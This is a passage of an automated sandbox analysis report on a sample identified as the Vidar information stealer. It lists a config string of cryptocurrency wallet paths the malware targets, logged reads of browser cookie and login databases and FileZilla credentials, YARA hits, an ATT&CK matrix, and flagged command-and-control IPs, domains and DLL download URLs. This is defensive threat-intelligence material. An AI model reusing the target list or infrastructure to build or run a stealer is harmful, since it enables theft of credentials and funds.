                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: Tenant.pifBinary or memory string: WIN_81
                    Source: Tenant.pifBinary or memory string: WIN_XP
                    Source: Tenant.pifBinary or memory string: WIN_XPe
                    Source: Tenant.pifBinary or memory string: WIN_VISTA
                    Source: Tenant.pifBinary or memory string: WIN_7
                    Source: Tenant.pifBinary or memory string: WIN_8
                    Source: Neo.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B1696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00B1696E
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B16E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00B16E32

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		2
                    Valid Accounts                    		11
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS27
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection                    		111
                    Masquerading                    		LSA Secrets61
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials1
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Virtualization/Sandbox Evasion                    		DCSync4
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501386 Sample: file.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 45 steamcommunity.com 2->45 47 stadiatechnologies.com 2->47 49 gCmUfnfZJOKMjo.gCmUfnfZJOKMjo 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 7 other signatures 2->65 9 file.exe 19 2->9         started        signatures3 process4 signatures5 67 Found stalling execution ending in API Sleep call 9->67 12 cmd.exe 2 9->12         started        process6 file7 37 C:\Users\user\AppData\Local\...\Tenant.pif, PE32 12->37 dropped 69 Drops PE files with a suspicious file extension 12->69 16 Tenant.pif 176 12->16         started        21 cmd.exe 2 12->21         started        23 conhost.exe 12->23         started        25 7 other processes 12->25 signatures8 process9 dnsIp10 39 stadiatechnologies.com 95.164.119.162, 59961, 80 VAKPoltavaUkraineUA Gibraltar 16->39 41 94.130.188.148, 443, 59938, 59939 HETZNER-ASDE Germany 16->41 43 steamcommunity.com 23.197.127.21, 443, 59937 AKAMAI-ASN1EU United States 16->43 29 C:\ProgramData\vcruntime140.dll, PE32 16->29 dropped 31 C:\ProgramData\softokn3.dll, PE32 16->31 dropped 33 C:\ProgramData\nss3.dll, PE32 16->33 dropped 35 3 other files (none is malicious) 16->35 dropped 51 Found many strings related to Crypto-Wallets (likely being stolen) 16->51 53 Tries to harvest and steal ftp login credentials 16->53 55 Tries to harvest and steal browser information (history, passwords, etc) 16->55 57 Tries to steal Crypto Currency Wallets 16->57 27 WerFault.exe 16 16->27         started        file11 signatures12 process13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe11%ReversingLabs
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\271973\Tenant.pif5%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
                    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://store.steampowered.com/points/shop/0%URL Reputationsafe
                    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                    https://store.steampowered.com/about/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a0%URL Reputationsafe
                    https://help.steampowered.com/en/0%URL Reputationsafe
                    https://store.steampowered.com/news/0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199761128941100%Avira URL Cloudmalware
                    https://94.130.188.148/nss3.dll100%Avira URL Cloudmalware
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://t.me/iyigunl100%Avira URL Cloudmalware
                    https://94.130.188.148/vcruntime140.dllCz100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
                    https://94.130.188.148/sqlr.dll100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=iyaDfxhc0%Avira URL Cloudsafe
                    https://store.steampowered.com/stats/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://store.steampowered.com/legal/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    https://store.steampowered.com/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
                    http://stadiatechnologies.comntent-Disposition:0%Avira URL Cloudsafe
                    https://94.130.188.148/100%Avira URL Cloudmalware
                    https://steamcommunity.com/login/home/?goto=profiles%2F765611997611289410%Avira URL Cloudsafe
                    http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/7656119976112894100%Avira URL Cloudsafe
                    http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                    http://stadiatechnologies.com0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://94.130.188.148/vcruntime140.dll100%Avira URL Cloudmalware
                    https://steamcommunity.com/profiles/76561199761128941/badges100%Avira URL Cloudmalware
                    http://stadiatechnologies.com/J0%Avira URL Cloudsafe
                    https://94.130.188.148/freebl3.dll100%Avira URL Cloudmalware
                    https://94.130.188.148/softokn3.dlle100%Avira URL Cloudmalware
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%Avira URL Cloudsafe
                    https://94.130.188.148/mozglue.dll100%Avira URL Cloudmalware
                    http://94.130.188.14887631f194nt-Disposition:0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199761128941b0%Avira URL Cloudsafe
                    https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                    http://stadia.188.148HIE0%Avira URL Cloudsafe
                    http://stadiatechnologies.alntent-Disposition:0%Avira URL Cloudsafe
                    https://94.130.188.148/softokn3.dll100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%Avira URL Cloudsafe
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                    https://steamcommunity.com/market/0%Avira URL Cloudsafe
                    https://94.130.188.148/nss3.dllKEBKJD-journal100%Avira URL Cloudmalware
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                    https://94.130.188.148100%Avira URL Cloudmalware
                    http://stadiatechnologies.com/0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199761128941/inventory/100%Avira URL Cloudmalware
                    https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                    https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn0%Avira URL Cloudsafe
                    https://94.130.188.148/mozglue.dllq100%Avira URL Cloudmalware
                    https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                    http://stadiatechnologies.1f19464;0%Avira URL Cloudsafe
                    https://94.130.188.148/sqlr.dll1100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cii-0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=od0wu57c9_w6&amp;l=e0%Avira URL Cloudsafe
                    https://94.130.188.148DGI0%Avira URL Cloudsafe
                    https://94.130.188.148/msvcp140.dll100%Avira URL Cloudmalware
                    https://94.130.188.148JKF0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://94.130.188.148/msvcp140.dllI100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		23.197.127.21
                    		truetrue
                      		unknown
                      stadiatechnologies.com
